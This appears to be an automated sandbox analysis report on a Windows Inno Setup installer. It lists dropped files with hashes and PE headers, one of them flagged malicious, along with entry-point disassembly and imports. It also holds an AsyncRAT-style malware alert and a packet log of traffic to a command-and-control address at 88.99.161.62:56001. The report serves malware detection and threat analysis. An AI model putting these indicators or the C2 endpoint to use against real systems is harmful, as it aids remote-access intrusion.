                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...V..O..........................................@..............................................@...............................7......<...........................................................................X...x............................text...<........................... ..`.itext.............................. ..`.data..../.......0..................@....bss....pa...............................idata...7.......8..................@....tls....<............ ...................rdata............... ..............@..@.rsrc...<............"..............@..@....................................@..@........................................................................................................................................
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-O75JM.tmp\i9DKxTZoVd.tmp
                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):6144
                                                                              Entropy (8bit):4.215994423157539
                                                                              Encrypted:false
                                                                              SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
                                                                              MD5:4FF75F505FDDCC6A9AE62216446205D9
                                                                              SHA1:EFE32D504CE72F32E92DCF01AA2752B04D81A342
                                                                              SHA-256:A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
                                                                              SHA-512:BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-O75JM.tmp\i9DKxTZoVd.tmp
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):23312
                                                                              Entropy (8bit):4.596242908851566
                                                                              Encrypted:false
                                                                              SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                              MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                              SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                              SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                              SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmp
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1183089
                                                                              Entropy (8bit):6.366383799611909
                                                                              Encrypted:false
                                                                              SSDEEP:24576:kYwCLCUplZhgjXj8YcgoniqO3CBiO0jaS+EtjC67V5MNx9XL:fGUhni7iSFCQGh
                                                                              MD5:240D43029FC0EEEA39338BB072979971
                                                                              SHA1:D0F08A4626007D5BC62906BDA2FB3CEBD2D0620C
                                                                              SHA-256:D7F6D81711E2B10E1FF719175ABB8CBB93641F48F68FE94D8B9F2677CC132F7E
                                                                              SHA-512:7B01B2A1C5B00C3A3D47CEC636CD6D0FC8FD2C632B398625F12A5F415BDF8FD358329792CD769A72FD9BB8980CAE584D025140D9EEC68720C5910E034DC0D08A
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 4%
                                                                              Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...V..O..........................................@..............................................@...............................7......<...........................................................................X...x............................text...<........................... ..`.itext.............................. ..`.data..../.......0..................@....bss....pa...............................idata...7.......8..................@....tls....<............ ...................rdata............... ..............@..@.rsrc...<............"..............@..@....................................@..@........................................................................................................................................
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmp
                                                                              File Type:InnoSetup Log Cloudy Floor, version 0x418, 3671 bytes, 768287\37\user\37, C:\Users\user\AppData\Local\376\377\377\
                                                                              Category:dropped
                                                                              Size (bytes):3671
                                                                              Entropy (8bit):3.760013788257662
                                                                              Encrypted:false
                                                                              SSDEEP:96:eH44NWzpZn3jCdfc1AGlEDA4MZAe2LpYHhDH:mxYpZ32f7fDSmuHh
                                                                              MD5:371509775D6E7A92A5C309D9557CC80C
                                                                              SHA1:8F5D6B790568A6B3E643629488DAD3D191E7567E
                                                                              SHA-256:6DC75EB5D6C2A80D8553615ACA0CF5E0E9EB8A092FD9210A6790E8D0210E101F
                                                                              SHA-512:8C5FA5F89A2DE661C7909393F360BF967F418C26F4ED61A9C4F714097D780F7C6AA9E205F03AB12B512A3689AE15C6A4E433652F29C8580EBA287DBF912300E9
                                                                              Malicious:false
                                                                              Preview:Inno Setup Uninstall Log (b)....................................Cloudy Floor....................................................................................................................Cloudy Floor............................................................................................................................W...%.................................................................................................................*.....t.............w........7.6.8.2.8.7......A.r.t.h.u.r......C.:.\.U.s.e.r.s.\.A.r.t.h.u.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l....................b.. ..............IFPS...............................................................................................................................................................BOOLEAN..............TEXECWAIT.................!MAIN....-1..'...dll:kernel32.dll.GetCurrentProcess.......(...dll:kernel32.dll.TerminateProcess................ ...RESTARTINSTALLERWITHSILENTPARAMS....-1..EXPANDCONSTANT........EXEC.....
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmp
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1183089
                                                                              Entropy (8bit):6.366383799611909
                                                                              Encrypted:false
                                                                              SSDEEP:24576:kYwCLCUplZhgjXj8YcgoniqO3CBiO0jaS+EtjC67V5MNx9XL:fGUhni7iSFCQGh
                                                                              MD5:240D43029FC0EEEA39338BB072979971
                                                                              SHA1:D0F08A4626007D5BC62906BDA2FB3CEBD2D0620C
                                                                              SHA-256:D7F6D81711E2B10E1FF719175ABB8CBB93641F48F68FE94D8B9F2677CC132F7E
                                                                              SHA-512:7B01B2A1C5B00C3A3D47CEC636CD6D0FC8FD2C632B398625F12A5F415BDF8FD358329792CD769A72FD9BB8980CAE584D025140D9EEC68720C5910E034DC0D08A
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 4%
                                                                              Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...V..O..........................................@..............................................@...............................7......<...........................................................................X...x............................text...<........................... ..`.itext.............................. ..`.data..../.......0..................@....bss....pa...............................idata...7.......8..................@....tls....<............ ...................rdata............... ..............@..@.rsrc...<............"..............@..@....................................@..@........................................................................................................................................
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmp
                                                                              File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1781248
                                                                              Entropy (8bit):6.995028051504293
                                                                              Encrypted:false
                                                                              SSDEEP:49152:AKX0xR9RtqCxPCFX1WoVFUjVM2mJVRQ7YiBp8Y+8Sc:ratqCxPCFX1vVeiRaBphoc
                                                                              MD5:9C2A3C72B19B3C65DF79E1262B840B52
                                                                              SHA1:D25DD891378F215104F493F4B2001F3902E17A3C
                                                                              SHA-256:E003A8AA982B96201768B48EDA1B375973C306D1CECECE73276F0267E11E2A1F
                                                                              SHA-512:7C28A68290B3C26354C3B7BCCA42B5BCBC81DFA01B3B699E47C68A3958E87DD3059FCC78099A60DDC901282980674900CDFCE7E5B80081873E9EB400182524A8
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 26%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...t<.D..........."...+.....*...... ...............................................4.....`... ......................................0..q....@.../...........`............................................. V..(....................K..x............................text...X...........................`..`.data........ ......................@....rdata...(...0...*..................@..@.pdata......`.......4..............@..@.xdata....... ......................@..@.bss......... ...........................edata..q....0......................@..@.idata.../...@...0..................@....CRT....`....p......................@....tls................................@....reloc..............................@..B........................................................................................................................................................................
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmp
                                                                              File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1781248
                                                                              Entropy (8bit):6.995028051504293
                                                                              Encrypted:false
                                                                              SSDEEP:49152:AKX0xR9RtqCxPCFX1WoVFUjVM2mJVRQ7YiBp8Y+8Sc:ratqCxPCFX1vVeiRaBphoc
                                                                              MD5:9C2A3C72B19B3C65DF79E1262B840B52
                                                                              SHA1:D25DD891378F215104F493F4B2001F3902E17A3C
                                                                              SHA-256:E003A8AA982B96201768B48EDA1B375973C306D1CECECE73276F0267E11E2A1F
                                                                              SHA-512:7C28A68290B3C26354C3B7BCCA42B5BCBC81DFA01B3B699E47C68A3958E87DD3059FCC78099A60DDC901282980674900CDFCE7E5B80081873E9EB400182524A8
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 26%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...t<.D..........."...+.....*...... ...............................................4.....`... ......................................0..q....@.../...........`............................................. V..(....................K..x............................text...X...........................`..`.data........ ......................@....rdata...(...0...*..................@..@.pdata......`.......4..............@..@.xdata....... ......................@..@.bss......... ...........................edata..q....0......................@..@.idata.../...@...0..................@....CRT....`....p......................@....tls................................@....reloc..............................@..B........................................................................................................................................................................
                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Entropy (8bit):7.935160477071088
                                                                              TrID:
                                                                              • Win32 Executable (generic) a (10002005/4) 98.86%
                                                                              • Inno Setup installer (109748/4) 1.08%
                                                                              • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                              File name:i9DKxTZoVd.exe
                                                                              File size:1'336'796 bytes
                                                                              MD5:108b6783fb581f9f9ce33936379ee0cd
                                                                              SHA1:d929bf4e5fa60a1084314149628458d44d2c2a83
                                                                              SHA256:02adaac35a67006fb3424a7e8264fccac9b54e2791f333f16bae2f3245efb4d7
                                                                              SHA512:a9f98b0a96a7026bff4312b4c388f325f114329150070e450d52eae5b5341752f26cb9c2c5583b1cae236e8a9a6e4fa2389e675cd5113d133cdd6728c8aa76bf
                                                                              SSDEEP:24576:AMjh2jn9tQZvTIcWJpwwQmQ4HiVVL1ZKPgWRqadRRn0dxD:zOn9eZLJCpwlmQ4HyvOgWRqadRRnqxD
                                                                              TLSH:F5552242F7D30436F43659389C62C1546D73B97126E2945A2DFCEE0E0ABA1C2583EFB6
                                                                              File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                              Icon Hash:2d2e3797b32b2b99
                                                                              Entrypoint:0x416478
                                                                              Entrypoint Section:.itext
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                              DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x4FC4B854 [Tue May 29 11:51:48 2012 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:5
                                                                              OS Version Minor:0
                                                                              File Version Major:5
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:5
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:483f0c4259a9148c34961abbda6146c1
                                                                              Instruction
                                                                              push ebp
                                                                              mov ebp, esp
                                                                              add esp, FFFFFFA4h
                                                                              push ebx
                                                                              push esi
                                                                              push edi
                                                                              xor eax, eax
                                                                              mov dword ptr [ebp-3Ch], eax
                                                                              mov dword ptr [ebp-40h], eax
                                                                              mov dword ptr [ebp-5Ch], eax
                                                                              mov dword ptr [ebp-30h], eax
                                                                              mov dword ptr [ebp-38h], eax
                                                                              mov dword ptr [ebp-34h], eax
                                                                              mov dword ptr [ebp-2Ch], eax
                                                                              mov dword ptr [ebp-28h], eax
                                                                              mov dword ptr [ebp-14h], eax
                                                                              mov eax, 004152B8h
                                                                              call 00007F26489A1651h
                                                                              xor eax, eax
                                                                              push ebp
                                                                              push 00416B45h
                                                                              push dword ptr fs:[eax]
                                                                              mov dword ptr fs:[eax], esp
                                                                              xor edx, edx
                                                                              push ebp
                                                                              push 00416B01h
                                                                              push dword ptr fs:[edx]
                                                                              mov dword ptr fs:[edx], esp
                                                                              mov eax, dword ptr [0041AB48h]
                                                                              call 00007F26489AFEFBh
                                                                              call 00007F26489AFAA2h
                                                                              lea edx, dword ptr [ebp-14h]
                                                                              xor eax, eax
                                                                              call 00007F26489A9724h
                                                                              mov edx, dword ptr [ebp-14h]
                                                                              mov eax, 0041D6E8h
                                                                              call 00007F264899FC87h
                                                                              push 00000002h
                                                                              push 00000000h
                                                                              push 00000001h
                                                                              mov ecx, dword ptr [0041D6E8h]
                                                                              mov dl, 01h
                                                                              mov eax, dword ptr [0040F080h]
                                                                              call 00007F26489AA00Fh
                                                                              mov dword ptr [0041D6ECh], eax
                                                                              xor edx, edx
                                                                              push ebp
                                                                              push 00416AADh
                                                                              push dword ptr fs:[edx]
                                                                              mov dword ptr fs:[edx], esp
                                                                              call 00007F26489AFF83h
                                                                              mov dword ptr [0041D6F4h], eax
                                                                              mov eax, dword ptr [0041D6F4h]
                                                                              cmp dword ptr [eax+0Ch], 01h
                                                                              jne 00007F26489B12EAh
                                                                              mov eax, dword ptr [0041D6F4h]
                                                                              mov edx, 00000028h
                                                                              call 00007F26489AA4D8h
                                                                              mov edx, dword ptr [0041D6F4h]
                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x1e0000xf9e.idata
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x210000xb1d8.rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x200000x18.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x1e3500x24c.idata
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                              .text0x10000x143f80x14400c9bb3afc1ceaaa31127ccfa204c657efFalse0.5487316743827161data6.482216817915366IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                              .itext0x160000xbe80xc001ba5adf2e1058c0460dcc814ba86fb32False0.6246744791666666data6.005798728198158IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                              .data0x170000xd9c0xe00d5b22eff9e08edaa95f493c1a71158c0False0.2924107142857143data2.669288666959085IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .bss0x180000x574c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .idata0x1e0000xf9e0x1000b47eaca4c149ee829de76a342b5560d5False0.35595703125data4.9677831942996935IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .tls0x1f0000x80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .rdata0x200000x180x2003746f5876803f8f30db5bb2deb8772aeFalse0.05078125data0.190488766434666IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .rsrc0x210000xb1d80xb200debddae1da37dfd6047daa43d23f03eaFalse0.17920470505617977data4.153832435967969IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                              RT_ICON0x2141c0x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States0.5675675675675675
                                                                              RT_ICON0x215440x568Device independent bitmap graphic, 16 x 32 x 8, image size 320EnglishUnited States0.4486994219653179
                                                                              RT_ICON0x21aac0x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.4637096774193548
                                                                              RT_ICON0x21d940x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152EnglishUnited States0.3935018050541516
                                                                              RT_STRING0x2263c0xc4data0.5969387755102041
                                                                              RT_STRING0x227000xccdata0.6225490196078431
                                                                              RT_STRING0x227cc0x174data0.5510752688172043
                                                                              RT_STRING0x229400x39cdata0.34523809523809523
                                                                              RT_STRING0x22cdc0x34cdata0.4218009478672986
                                                                              RT_STRING0x230280x294data0.4106060606060606
                                                                              RT_RCDATA0x232bc0x82e8dataEnglishUnited States0.11261637622344235
                                                                              RT_RCDATA0x2b5a40x10data1.5
                                                                              RT_RCDATA0x2b5b40x1a0data0.8149038461538461
                                                                              RT_RCDATA0x2b7540x2cdata1.1818181818181819
                                                                              RT_GROUP_ICON0x2b7800x3edataEnglishUnited States0.8387096774193549
                                                                              RT_VERSION0x2b7c00x4b8COM executable for DOSEnglishUnited States0.28642384105960267
                                                                              RT_MANIFEST0x2bc780x560XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4251453488372093
                                                                              DLLImport
                                                                              oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                              advapi32.dllRegQueryValueExW, RegOpenKeyExW, RegCloseKey
                                                                              user32.dllGetKeyboardType, LoadStringW, MessageBoxA, CharNextW
                                                                              kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetSystemInfo, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenW, lstrcpynW, LoadLibraryExW, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetCommandLineW, FreeLibrary, FindFirstFileW, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle, CloseHandle
                                                                              kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleW
                                                                              user32.dllCreateWindowExW, TranslateMessage, SetWindowLongW, PeekMessageW, MsgWaitForMultipleObjects, MessageBoxW, LoadStringW, GetSystemMetrics, ExitWindowsEx, DispatchMessageW, DestroyWindow, CharUpperBuffW, CallWindowProcW
                                                                              kernel32.dllWriteFile, WideCharToMultiByte, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, SizeofResource, SignalObjectAndWait, SetLastError, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, RemoveDirectoryW, ReadFile, MultiByteToWideChar, LockResource, LoadResource, LoadLibraryW, LeaveCriticalSection, InitializeCriticalSection, GetWindowsDirectoryW, GetVersionExW, GetUserDefaultLangID, GetThreadLocale, GetSystemInfo, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetLocalTime, GetLastError, GetFullPathNameW, GetFileSize, GetFileAttributesW, GetExitCodeProcess, GetEnvironmentVariableW, GetDiskFreeSpaceW, GetDateFormatW, GetCurrentProcess, GetCommandLineW, GetCPInfo, InterlockedExchange, InterlockedCompareExchange, FreeLibrary, FormatMessageW, FindResourceW, EnumCalendarInfoW, EnterCriticalSection, DeleteFileW, DeleteCriticalSection, CreateProcessW, CreateFileW, CreateEventW, CreateDirectoryW, CompareStringW, CloseHandle
                                                                              advapi32.dllRegQueryValueExW, RegOpenKeyExW, RegCloseKey, OpenProcessToken, LookupPrivilegeValueW
                                                                              comctl32.dllInitCommonControls
                                                                              kernel32.dllSleep
                                                                              advapi32.dllAdjustTokenPrivileges
                                                                              oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                                                              Language of compilation systemCountry where language is spokenMap
                                                                              EnglishUnited States
                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                              2024-12-10T07:00:59.505222+01002035595ET MALWARE Generic AsyncRAT Style SSL Cert188.99.161.6256001192.168.11.2049761TCP
                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Dec 10, 2024 07:00:58.573466063 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:00:58.792820930 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:00:58.793055058 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:00:58.795938969 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:00:59.015156984 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:00:59.015332937 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:00:59.239620924 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:00:59.239662886 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:00:59.239939928 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:00:59.246365070 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:00:59.505222082 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:00:59.552104950 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:00:59.602289915 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:01.133064032 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:01.392791986 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:01.392987967 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:01.652374029 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:04.033536911 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:04.085694075 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:04.304677010 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:04.313019037 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:04.572269917 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:04.572396994 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:04.820804119 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:04.820939064 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:04.820950985 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:04.821014881 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:04.821024895 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:04.821120024 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:04.821213007 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:04.821224928 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:04.821234941 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:04.821244955 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:04.821393967 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:04.821398020 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:04.821398973 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:04.821398973 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:04.821413994 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:04.821553946 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:04.821568012 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.040457964 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.040491104 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.040518045 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.040539980 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.040560961 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.040581942 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.040652990 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.040652990 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.040745020 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.040766001 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.040767908 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.040790081 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.040824890 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.040852070 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.040873051 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.040894985 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.040915966 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.040975094 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.041003942 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.041007042 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.041028023 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.041049004 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.041073084 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.041090965 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.041094065 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.041116953 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.041169882 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.041176081 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.041196108 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.041196108 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.041318893 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.041397095 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.259855986 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.259886980 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.259912014 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.259934902 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.260051966 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.260143995 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.260159016 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.260166883 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.260190010 CET560014976188.99.161.62192.168.11.20
